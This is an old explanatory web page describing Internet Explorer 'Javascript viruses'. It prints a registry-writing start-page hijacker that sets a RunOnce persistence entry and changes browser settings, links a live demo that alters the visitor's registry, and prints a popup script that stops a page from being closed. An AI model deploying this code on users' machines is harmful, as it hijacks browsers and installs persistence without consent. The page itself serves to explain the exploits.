Javascript Viruses

These are javascript exploits that seem to work best with Internet Explorer.

In general, I've changed the urls in the code so that specific sites can not be identified.

Start Page Hijacker | Can't Close Web Page | References

Start Page Hijacker

This is the type of code fragment that infects Internet Explorer. The fact that this is even possible says it all.

I'm not sure if this is javascript or vbScript - they both allow this. The difference is whether or not there should be 1 or 2 backslashes in the registry paths.

var url = "http://someURL.com/startpage.html";
var burl = "http://someURL.com/SearchBar.html";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "exe or js filename";

var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\xxx",filepath);
Shell.RegWrite("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",url);
Shell.RegWrite("HKCU\Software\Microsoft\Internet Explorer\Main\Search Page",url);
Shell.RegWrite("HKCU\Software\Microsoft\Internet Explorer\Main\Search Bar",burl);
Shell.RegWrite("HKCU\Software\Microsoft\Internet Explorer\Main\Use Search Asst","no");
Shell.RegWrite("HKCU\Software\Microsoft\Internet Explorer\Main\Use Custom Search URL",
                   1,"REG_DWORD");

I have provided a simple browser hijacker to demonstrate how easy this is. Before you try it, please use Tools / Internet Options... / Home page to copy your current home page url to the clipboard and then paste it somewhere so that you don't loose it - you've been warned.

Waning: Clicking this link opens a page that modifies YOUR registry - Javascript_virus_test

Can't Close Web Page

I found this code on a page that you could not close - every time you try to close the existing window it just opens a new one. I finally used Alt-Ctrl-Del to close the window. Examining the code, it is obvious that more normal behaivor is restored once you click one of the links.

temp=0; function ex() { id=window.open ('',"popup","left=0,top=0,width="+screen.availWidth+", height="+screen.availHeight+", scrollbars=1"); id.blur(); id.location.href="http://xxx.com"; } read_link=setInterval ("r_link();",100); function r_exe() { window.onbeforeunload=null; } function r_link() { n_link=document.links.length; if (temp<n_link) { for (i=temp;i<n_link;i++) { document.links[i].onclick=r_exe; } temp=i; } } window.onbeforeunload=ex;

The page was included via

References

Be careful searching the internet for data related to these exploits - the page you open "might" infect your system.

Author: Robert Clemenzi